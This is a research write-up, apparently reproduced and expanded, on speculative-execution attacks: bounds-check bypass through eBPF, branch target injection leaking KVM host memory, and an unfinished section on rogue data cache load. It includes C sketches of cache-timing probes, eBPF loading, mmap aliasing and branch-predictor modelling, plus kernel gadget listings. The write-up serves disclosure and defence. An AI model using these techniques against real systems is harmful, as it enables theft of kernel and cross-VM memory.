Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 …
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

 

  • load value = arr1->data[untrusted_offset_from_caller]
  • start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

 

struct array {
 unsigned long length;
 unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
 unsigned char value = arr1->data[untrusted_offset_from_caller];
 unsigned long index2 = ((value&1)*0x100)+0x200;
 if (index2 < arr2->length) {
   unsigned char value2 = arr2->data[index2];
 }
}

 

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
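The timing step is a standard FLUSH+RELOAD measurement. The following sketch (illustrative only, using x86 intrinsics, and not taken from the PoC) shows how the two candidate offsets could be timed and how the leaked bit is recovered:

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

/* Time a single one-byte load, in cycles (illustrative FLUSH+RELOAD probe). */
static uint64_t time_access(volatile uint8_t *p) {
    unsigned aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*p;                               /* the load being timed */
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}

/* Decide whether index2 was 0x200 or 0x300 during the speculative access. */
static int leaked_bit(volatile uint8_t *arr2_data) {
    uint64_t t200 = time_access(arr2_data + 0x200);
    uint64_t t300 = time_access(arr2_data + 0x300);
    /* Flush both lines again before the next round. */
    _mm_clflush((void *)(arr2_data + 0x200));
    _mm_clflush((void *)(arr2_data + 0x300));
    return t300 < t200;                     /* the faster load is the cached one */
}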

 

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

 

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

 

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

 

  • either interpreted by an in-kernel bytecode interpreter
  • or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

 

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.
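As a minimal illustration of that trigger path (a sketch under the assumption that unprivileged bpf() is permitted; error handling omitted), a trivial eBPF program can be loaded with the bpf() syscall and attached to one end of a socketpair, so that every write to the other end runs the bytecode in kernel context:

#include <linux/bpf.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
    /* "return 0" — drop everything; the point is only that the bytecode runs in the kernel. */
    struct bpf_insn prog[] = {
        { .code = BPF_ALU64 | BPF_MOV | BPF_K, .dst_reg = BPF_REG_0, .imm = 0 },
        { .code = BPF_JMP | BPF_EXIT },
    };
    union bpf_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insn_cnt  = sizeof(prog) / sizeof(prog[0]);
    attr.insns     = (unsigned long)prog;
    attr.license   = (unsigned long)"GPL";
    int prog_fd = syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));

    int fds[2];
    socketpair(AF_UNIX, SOCK_DGRAM, 0, fds);
    setsockopt(fds[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));

    write(fds[1], "x", 1);   /* the filter now executes in kernel context */
    return 0;
}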

 

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

 

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

 

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

 

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

 

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).
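The slowdown caused by such intentional false sharing can be demonstrated with a small standalone program (a hypothetical demo, not the eBPF reference counter itself; the core numbers are assumptions): one thread pinned to another core keeps writing one field of a cache line while the main thread times reads of a neighbouring field in the same line.

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <stdint.h>
#include <stdio.h>
#include <x86intrin.h>

/* Two fields that deliberately share one 64-byte cache line, like refcount and length do. */
static struct { volatile uint64_t refcount; volatile uint64_t length; }
    __attribute__((aligned(64))) shared;

static void *bouncer(void *arg) {
    cpu_set_t set; CPU_ZERO(&set); CPU_SET(1, &set);            /* writer pinned to core 1 */
    pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    for (;;) shared.refcount++;                                  /* keeps stealing the line */
}

int main(void) {
    cpu_set_t set; CPU_ZERO(&set); CPU_SET(0, &set);             /* reader pinned to core 0 */
    sched_setaffinity(0, sizeof(set), &set);
    pthread_t t; pthread_create(&t, NULL, bouncer, NULL);

    unsigned aux; uint64_t sum = 0;
    for (int i = 0; i < 100000; i++) {
        uint64_t start = __rdtscp(&aux);
        (void)shared.length;                                     /* read slowed by the bouncing line */
        sum += __rdtscp(&aux) - start;
    }
    printf("avg read latency: %lu cycles\n", (unsigned long)(sum / 100000));
    return 0;
}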

 

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

 

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 2^15 adjacent userspace memory mappings [9], each consisting of 2^4 pages, are created at the userspace address user_mapping_area, covering a total area of 2^31 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.
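Such a set of mappings can be created by mapping one small memfd many times at fixed adjacent addresses. The sketch below is illustrative; the base address is an assumption, and the counts follow the description above:

#define _GNU_SOURCE
#include <stdint.h>
#include <sys/mman.h>
#include <unistd.h>

#define PAGE           4096UL
#define MAPPING_PAGES  (1UL << 4)     /* 2^4 pages per mapping */
#define NUM_MAPPINGS   (1UL << 15)    /* 2^15 adjacent mappings */

int main(void) {
    uint8_t *user_mapping_area = (uint8_t *)0x100000000000UL;   /* assumed-free base address */
    int fd = memfd_create("probe", 0);                          /* one set of physical pages */
    ftruncate(fd, MAPPING_PAGES * PAGE);

    for (unsigned long i = 0; i < NUM_MAPPINGS; i++) {
        void *addr = user_mapping_area + i * MAPPING_PAGES * PAGE;
        /* Every mapping refers to the same physical pages; MAP_POPULATE keeps
           the mapping present in the pagetables. */
        mmap(addr, MAPPING_PAGES * PAGE, PROT_READ | PROT_WRITE,
             MAP_SHARED | MAP_FIXED | MAP_POPULATE, fd, 0);
    }
    /* Total area covered: 2^15 * 2^4 * 4096 = 2^31 bytes. */
    return 0;
}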

 

 

 

This permits the attack to be carried out in steps of 2^31 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 2^4 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

 

When this attack finds a hit (a cached memory location), the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). Only the middle bits of the address remain to be determined.

 

 

 

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
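In code, the setup looks roughly like this (a hypothetical victim call site; the CLFLUSH is what opens the long speculation window):

#include <x86intrin.h>

void (*victim_handler)(void);        /* indirect branch target stored in memory */

void call_victim(void) {
    /* Attacker (or a colluding context) flushes the cache line that holds the pointer... */
    _mm_clflush((void *)&victim_handler);
    _mm_mfence();
    /* ...so this indirect call cannot resolve its target for a few hundred cycles,
       and the CPU speculatively executes whatever the branch predictor suggests. */
    victim_handler();
}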

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A           bit B
0x40.0000       0x2000
0x80.0000       0x4000
0x100.0000      0x8000
0x200.0000      0x1.0000
0x400.0000      0x2.0000
0x800.0000      0x4.0000
0x2000.0000     0x10.0000
0x4000.0000     0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
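The folding can be expressed as a small helper derived from the table above (a model of the observed behavior, nothing more): fold each «bit A» onto its «bit B» and drop bit A; two source addresses alias exactly when their folded values are equal.

#include <stdint.h>
#include <stdbool.h>

/* Fold the low 31 bits of a branch-source address as described by the table above. */
static uint32_t fold_source_address(uint64_t src) {
    uint32_t a = (uint32_t)(src & 0x7fffffff);       /* only the lower 31 bits are used */
    static const uint32_t pairs[][2] = {
        { 0x400000,   0x2000   }, { 0x800000,   0x4000   },
        { 0x1000000,  0x8000   }, { 0x2000000,  0x10000  },
        { 0x4000000,  0x20000  }, { 0x8000000,  0x40000  },
        { 0x20000000, 0x100000 }, { 0x40000000, 0x200000 },
    };
    uint32_t folded = a;
    for (unsigned i = 0; i < sizeof(pairs) / sizeof(pairs[0]); i++) {
        if (a & pairs[i][0])
            folded ^= pairs[i][1];    /* project bit A onto bit B */
        folded &= ~pairs[i][0];       /* and drop bit A itself */
    }
    return folded;
}

static bool btb_aliases(uint64_t src1, uint64_t src2) {
    return fold_source_address(src1) == fold_source_address(src2);
}

For example, fold_source_address(0x1000000) and fold_source_address(0x1402000) both evaluate to 0x8000, matching the aliasing example in the text.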

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 - 2);
 *bhb_state ^= (src & 0xc000) >> (14 - 4);
 *bhb_state ^= (src & 0x30) << (6 - 4);
 *bhb_state ^= (src & 0x300) << (8 - 8);
 *bhb_state ^= (src & 0x3000) >> (12 - 10);
 *bhb_state ^= (src & 0x30000) >> (16 - 12);
 *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4 = 0x400.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.
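From inside the guest, triggering that code path can be as simple as reading the line status register of the emulated COM1 port. A sketch (it assumes the process has I/O-port access, e.g. as root via iopl(), which the variant 2 PoC already requires):

#include <sys/io.h>     /* iopl(), inb() */

#define COM1_BASE 0x3f8
#define COM1_LSR  (COM1_BASE + 5)    /* line status register of the emulated serial port */

static unsigned char poke_serial_status(void) {
    iopl(3);                          /* grant port access; needs root / CAP_SYS_RAWIO */
    /* The port read is emulated by the host: vmexit -> vmlinux -> indirect call into kvm.ko. */
    return inb(COM1_LSR);
}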

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set), and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xf8 is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.
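In code, the idea looks roughly like this (a heavily simplified sketch; dependent_flag is a hypothetical variable that is trained to 1, then flushed and set to 0 so that the branch resolves late, and probe is a FLUSH+RELOAD probe array as in variant 1):

#include <stdint.h>
#include <x86intrin.h>

extern volatile uint8_t probe[2 * 4096];  /* probe array, flushed beforehand (hypothetical) */
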